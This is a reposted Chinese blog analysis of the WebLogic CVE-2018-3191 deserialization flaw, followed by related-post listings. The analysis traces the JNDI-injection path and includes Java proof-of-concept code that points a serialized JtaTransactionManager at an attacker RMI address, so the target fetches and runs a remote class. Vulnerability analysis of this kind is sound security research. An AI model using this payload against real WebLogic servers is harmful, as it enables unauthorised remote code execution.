weblogic之CVE-2018-3191漏洞分析

最新推荐文章于 2024-04-08 09:39:48 发布
转载 最新推荐文章于 2024-04-08 09:39:48 发布 · 389 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/afanti/p/10256843.html

weblogic之CVE-2018-3191漏洞分析

理解这个漏洞首先需要看这篇文章:https://www.cnblogs.com/afanti/p/10193169.html
引用廖新喜说的,说白的就是反序列化时lookup中的参数可控,导致 JNDI注入

AbstractPlatformTransactionManager这个黑名单就是用于防止Spring JNDI注入,从官方以前的黑名单上就能看到org.springframework.transaction.support.AbstractPlatformTransactionManager,但是官方没有想到在com.bea.core.repackaged的相关包还有spring的相关类。其实这两个包中的类实现几乎一样,只是来源于不同的包。

看下利用过程:
生成poc.
Alt text
服务器开启jndi服务,ExportObject.java恶意类就是弹个计算器
Alt text
通过T3协议发送数据包,服务器向jndi请求恶意类,反序列化导致RCE:
Alt text
跟一下漏洞过程:
来到com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager类的initUserTransactionAndTransactionManager方法,this.userTransactionName属性被赋值为恶意rmi地址,跟进164行:
Alt text
跟进lookup方法
Alt text
Alt text
最后看一下poc生成过程:
导入所用到的com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar包和com.bea.core.repackaged.apache.commons.logging_1.2.1.jar包,将UserTransactionName参数注入恶意类地址。

        String test;
        System.out.println("hahha");

        test = "rmi://192.168.20.112:2222/aa";
        JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
        jtaTransactionManager.setUserTransactionName(test);
        File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\obj.txt");
        ObjectOutputStream out1 = new ObjectOutputStream(new FileOutputStream(f));
        out1.writeObject(jtaTransactionManager);
        out1.flush();
        out1.close();

Alt text

参考链接:
https://paper.tuisec.win/detail/a312d98e0285e24
https://github.com/pyn3rd/CVE-2018-3191
https://paper.seebug.org/718/

转载于:https://www.cnblogs.com/afanti/p/10256843.html

linux环境weblogic栈溢出,从流量侧浅谈WebLogic远程代码执行漏洞CVE-2018-3191
weixin_35844772的博客
05-16 669
原标题:从流量侧浅谈WebLogic远程代码执行漏洞(CVE-2018-3191)一、前言在不久前Oracle官方发布的10月重要补丁更新公告(Oracle Critical Patch Update Advisory – October 2018)中发布了五个基于T3协议的WebLogic远程高危漏洞(CVE-2018-3191CVE-2018-3197、CVE-2018-3201、CVE-2...
WebLogic CVE-2018-3191 payload
10-23
WebLogic CVE-2018-3191 payload 检测工具。
weblogic系列漏洞整理————9、Weblogic CVE-2018-3191分析
Fly_鹏程万里
11-01 1552
背景 北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。这个漏洞...
CVE-2018-3191
Jiajiajiang_的博客
11-03 1447
通过该漏洞攻击者可以在未授权的情况下远程执行代码,该漏洞主要利用spring JDNI反序列化注入实现远程命令执行。攻击者可以在未授权的情况下将payload封装在T3协议中,通过T3协议中的Payload进行反序列化,从而实现对存在漏洞weblogic组件进行远程攻击,执行任意代码并可获取目标系统的所有权限。 受影响版本 WebLogic 10.3.6.0 WebLogic 12....
weblogic CVE-2018-3191 exp(含weblogic-spring-jndi-10.3.6.0.jar)
07-05
自用CVE-2018-3191 weblogic反序列化exp。
oracle11g远程命令执行漏洞,Weblogic CVE-2018-3191远程代码命令执行漏洞复现
weixin_39679468的博客
04-03 525
0x00 简介北京时间10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。0x01 漏洞复现目标weblogc...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
K8 weblogic-CVE-2018-2628-getshell
07-16
【K8 weblogic-CVE-2018-2628-getshell】是一个针对Oracle WebLogic Server的渗透测试工具,主要用于检验系统是否存在CVE-2018-2628漏洞并利用该漏洞获取shell权限。这个工具的使用应该严格限制在合法的安全测试环境...
weblogic12c 漏洞 CVE-2018-2628补丁
07-23
2018最新weblogic反序列化漏洞补丁包 CVE-2018-2628补丁
cve-2018-3191简析
一个安全研究员
05-27 1936
如题
春秋云镜 CVE-2018-3191
qq_22002773的博客
08-30 506
春秋云镜 CVE-2018-3191
weblogic用于PHP,从流量侧浅谈WebLogic远程代码执行漏洞CVE-2018-3191
weixin_35626107的博客
03-27 440
一、前言在不久前Oracle官方发布的10月重要补丁更新公告(Oracle Critical Patch Update Advisory - October 2018)中发布了五个基于T3协议的WebLogic远程高危漏洞(CVE-2018-3191CVE-2018-3197、CVE-2018-3201、CVE-2018-3245、CVE-2018-3252),CVSS 3.0 Base Sco...
探索CVE-2018-3191:洞悉安全漏洞,强化你的系统防护
最新发布
gitblog_00003的博客
04-08 434
探索CVE-2018-3191:洞悉安全漏洞,强化你的系统防护 去发现同类优质开源项目:https://gitcode.com/ 该项目是Libraggbond对2018年发现的一个重大安全漏洞——CVE-2018-3191的详细研究和分析。通过深入理解这个漏洞,我们可以学习如何预防此类攻击,并提升我们的网络安全意识。 项目简介 CVE-2018-3191是一个影响Apple Safari浏览器的...
【春秋云境】CVE-2018-3191-weblogic漏洞利用工具-WeblogicTool
HMX404的博客
01-28 487
迫于目前现有的weblogic工具没怎么更新、payloayjdk适用版本等问题,所以基于superman18、sp4zcmd等项目,写一个weblogic工具,工具运行版本要求jdk 8(深信服深蓝实验室天威战队强力驱动)
CVE-2018-3191远程代码命令执行漏洞
玄道的网安博客
10-26 4096
0x00 weblogic漏洞简介 北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而...
漫谈 WebLogic-CVE-2020-2551
数据库生态圈(RDB & NoSQL & Bigdata)——专注于关系库优化(Oracle&Mysql&PG&SQL Server )
01-14 1715
本文源自:https://paper.seebug.org/1149/#jdk 作者:r4v3zn@白帽汇安全研究院本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送!投稿邮箱:paper@seebug.org 背景 2020 年 1月14日,Oracle 发布了大量安全补丁,修复了 43 个严重漏洞,CVSS 评分均在在9.1以上。 其中 CVE-2020-2551 漏洞,互联网中公布了几篇针对该漏洞分析文章以及POC,但公布的 POC 有部分不足之处,导致漏洞检测效..
weblogic漏洞打补丁,安装OPatch补丁
大宇进阶之路的博客
07-18 3004
T3协议的漏洞,共有三个版本受影响10.3.6.0,12.1.3.0,12.2.1.3。Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆。方法1下载oracle官方补丁。weblogic漏洞。后,可以下载最新补丁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值